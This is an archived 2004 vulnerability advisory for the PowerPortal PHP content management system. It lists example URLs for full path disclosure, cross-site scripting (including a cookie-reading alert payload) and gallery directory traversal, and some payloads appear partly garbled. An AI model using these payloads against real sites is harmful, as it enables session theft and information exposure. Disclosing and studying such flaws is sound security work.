TUCoPS :: Web :: CMS / Portals

TUCoPS :: Web :: CMS / Portals :: hack3447.htm
PowerPortal Multiple vulnerabilities

Multiple vulnerabilities PowerPortal http://www.swp-zone.org/archivos/advisory-07.txt ------------------------------------------------------------------------------------------------- :.: Multiple vulnerabilities PowerPortal :.: PROGRAM: PowerPortal HOMEPAGE: http://powerportal.sourceforge.net/ VERSION: v1.x BUG: Multiple vulnerabilities DATE: 23/05/2004 AUTHOR: DarkBicho web: http://www.darkbicho.tk team: Security Wari Proyects Email: darkbicho@peru.com ------------------------------------------------------------------------------------------------- 1.- Affected software description: ------------------------------ PowerPortal is a popular content management system, written in php 2.- Vulnerabilities: --------------- A. Full path disclosure: This vulnerability would allow a remote user to determine the full path to the web root directory and other potentially sensitive information. :.: Examples: * http://attacker/modules/gallery/resize.php Warning: imagecreatetruecolor(): Invalid image dimensions in c:\appserv\www\power\modules\gallery\resize.php on line 18 Warning: imagecopyresized(): supplied argument is not a valid Image resource in c:\appserv\www\power\modules\gallery\resize.php on line 20 Warning: imagejpeg(): supplied argument is not a valid Image resource in c:\appserv\www\power\modules\gallery\resize.php on line 23 * http://attacker/power/modules.php?name=gallery&files=darkbicho Warning: opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho): failed to open dir: Invalid argument in c:\appserv\www\power\modules\gallery\index.php on line 99 B. Cross-Site Scripting aka XSS: http://attacker/modules.php?name=private_messages&file=reply&id=' > http://attacker/modules.php?name=links&search=&func=search_results http://attacker/modules.php?name=content&file=search&search= t>alert(document.cookie);&func=results http://attacker/modules.php?name=gallery&files= C. Arbitrary directory browsing: * http://attacker/modules.php?name=gallery&files=/../../../ 3.- SOLUTION: จจจจจจจจ Vendors were contacted many weeks ago and plan to release a fixed version soon. Check the PowerPortal website for updates and official release details. 4.- Greetings: --------- greetings to my Peruvian group swp and perunderforce :D "EL PISCO ES Y SERA PERUANO" 5.- Contact ------- WEB: http://www.darkbicho.tk EMAIL: darkbicho@peru.com ------------------------------------------------------------------------------------------------- ___________ ____________ / _____/ \ / \______ \ \_____ \\ \/\/ /| ___/ / \\ / | | /_______ / \__/\ / |____| \/ \/ Security Wari Projects (c) 2002 - 2004 Made in Peru ----------------------------------------[ EOF ]---------------------------------------------- DarkBicho Web: http://www.darkbicho.tk "Mi unico delito es ver lo que otros no pueden ver" ---------------------- The End ----------------------